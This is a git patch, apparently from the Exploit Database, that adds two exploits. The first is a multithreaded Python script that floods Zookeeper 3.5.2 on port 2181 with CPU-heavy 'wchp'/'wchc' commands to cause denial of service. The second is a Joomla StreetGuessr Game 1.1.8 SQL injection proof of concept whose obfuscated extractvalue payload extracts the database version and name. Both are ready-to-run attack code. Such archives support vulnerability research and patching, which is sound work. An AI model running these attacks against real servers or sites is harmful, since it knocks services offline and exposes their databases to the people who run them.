From 79b3065b37bb85d192b46d7a5aa727f951087326 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 5 Aug 2017 05:01:29 +0000 Subject: [PATCH] DB: 2017-08-05 2 new exploits Zookeeper 3.5.2 Client - Denial of Service Joomla! Component StreetGuessr Game 1.1.8 - SQL Injection --- files.csv | 2 + platforms/multiple/dos/42294.py | 85 +++++++++++++++++++++++++++++++++ platforms/php/webapps/42423.txt | 16 +++++++ 3 files changed, 103 insertions(+) create mode 100755 platforms/multiple/dos/42294.py create mode 100755 platforms/php/webapps/42423.txt diff --git a/files.csv b/files.csv index 5b5de8d43..f8d963b58 100644 --- a/files.csv +++ b/files.csv @@ -5605,6 +5605,7 @@ id,file,description,date,author,platform,type,port 42279,platforms/freebsd_x86/dos/42279.c,"FreeBSD - 'setrlimit' Stack Clash (PoC)",2017-06-28,"Qualys Corporation",freebsd_x86,dos,0 42285,platforms/android/dos/42285.txt,"LG MRA58K - 'ASFParser::SetMetaData' Stack Overflow",2017-06-30,"Google Security Research",android,dos,0 42286,platforms/multiple/dos/42286.txt,"Google Chrome - Out-of-Bounds Access in RegExp Stubs",2017-06-30,"Google Security Research",multiple,dos,0 +42294,platforms/multiple/dos/42294.py,"Zookeeper 3.5.2 Client - Denial of Service",2017-07-02,"Brandon Dennis",multiple,dos,2181 42299,platforms/linux/dos/42299.txt,"LibTIFF - 'tif_dirwrite.c' Denial of Service",2017-07-06,"team OWL337",linux,dos,0 42300,platforms/linux/dos/42300.txt,"LibTIFF - 'tif_jbig.c' Denial of Service",2017-07-06,"team OWL337",linux,dos,0 42301,platforms/linux/dos/42301.txt,"LibTIFF - '_TIFFVGetField (tiffsplit)' Out-of-Bounds Read",2017-07-06,zhangtan,linux,dos,0 @@ -38225,4 +38226,5 @@ id,file,description,date,author,platform,type,port 42419,platforms/php/webapps/42419.txt,"Premium Servers List Tracker 1.0 - SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0 42420,platforms/php/webapps/42420.txt,"EDUMOD Pro 1.3 - SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0 42421,platforms/php/webapps/42421.txt,"Muviko 1.0 - 'q' Parameter SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0 +42423,platforms/php/webapps/42423.txt,"Joomla! Component StreetGuessr Game 1.1.8 - SQL Injection",2017-08-03,"Ihsan Sencan",php,webapps,0 42427,platforms/hardware/webapps/42427.html,"Technicolor TC7337 - SSID Persistent Cross-Site Scripting",2017-08-03,"Geolado giolado",hardware,webapps,0 diff --git a/platforms/multiple/dos/42294.py b/platforms/multiple/dos/42294.py new file mode 100755 index 000000000..41aba239b --- /dev/null +++ b/platforms/multiple/dos/42294.py @@ -0,0 +1,85 @@ +#!/usr/bin/python + +# Exploit Title: Zookeeper Client Denial Of Service (Port 2181) +# Date: 2/7/2017 +# Exploit Author: Brandon Dennis +# Email: bdennis@mail.hodges.edu +# Software Link: http://zookeeper.apache.org/releases.html#download +# Zookeeper Version: 3.5.2 +# Tested on: Windows 2008 R2, Windows 2012 R2 x64 & x86 +# Description: The wchp command to the ZK port 2181 will gather open internal files by each session/watcher and organize them for the requesting client. +# This command is CPU intensive and will cause a denial of service to the port as well as spike the CPU of the remote machine to 90-100% consistently before any other traffic. +# The average amount of threads uses was 10000 for testing. This should work on all 3.x+ versions of Zookeeper. +# This should effect Linux x86 & x64 as well + + + +import time +import os +import threading +import sys +import socket + +numOfThreads = 1 +exitStr = "n" +stop_threads = False +threads = [] +ipAddress = "192.168.1.5" #Change this +port = 2181 + +def sendCommand(ipAddress, port): + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((ipAddress, port)) + s.send("wchp\r".encode("utf-8")) + s.recv(1024) + s.send("wchc\r".encode("utf-8")) + s.close() + except: + pass + + +def runCMD(id, stop, ipAddress, port): + while True: + sendCommand(ipAddress, port) + if stop(): + break + return + +def welcomeBanner(): + banner = """ _______ __ _____ _ +|___ | | / / / __ \ | | + / /| |/ / | / \/_ __ __ _ ___| |__ ___ _ __ + / / | \ | | | '__/ _` / __| '_ \ / _ | '__| +./ /__| |\ \ | \__/| | | (_| \__ | | | | __| | +\_____\_| \_/ \____|_| \__,_|___|_| |_|\___|_| + + By: Brandon Dennis + Email: bdennis@mail.hodges.edu + """ + print(banner) + + +welcomeBanner() +numOfThreads = int(input("How many threads do you want to use: ")) +print ("Startin Up Threads...") +for i in range(numOfThreads): + t = threading.Thread(target=runCMD, args=(id, lambda: stop_threads, ipAddress, port)) + threads.append(t) + t.start() +print("Threads are now started...") + + +while exitStr != "y": + inpt = input("Do you wish to stop threads(y): ") + + if inpt == "y": + exitStr = "y" + +print("\nStopping Threads...") +stop_threads = True +for thread in threads: + thread.join() + +print("Threads are now stopped...") +sys.exit(0); diff --git a/platforms/php/webapps/42423.txt b/platforms/php/webapps/42423.txt new file mode 100755 index 000000000..c980f8a82 --- /dev/null +++ b/platforms/php/webapps/42423.txt @@ -0,0 +1,16 @@ +# # # # # +# Exploit Title: Joomla! Component StreetGuessr Game v1.1.8 - SQL Injection +# Dork: N/A +# Date: 03.08.2017 +# Vendor : https://www.nordmograph.com/ +# Software: https://extensions.joomla.org/extensions/extension/sports-a-games/streetguessr-game/ +# Demo: https://www.streetguessr.com/en/component/streetguess/ +# Version: 1.1.8 +# # # # # +# Author: Ihsan Sencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_streetguess&view=maps&catid=[SQL] +# 0'+/*!11110procedure*/+/*!11110analyse*/+(/*!11110extractvalue*/(0x30,/*!11110concat*/(0x27,/*!11110@@version*/,0x7e,/*!11110database()*/)),0x30)--+- +# Etc.. +# # # # # \ No newline at end of file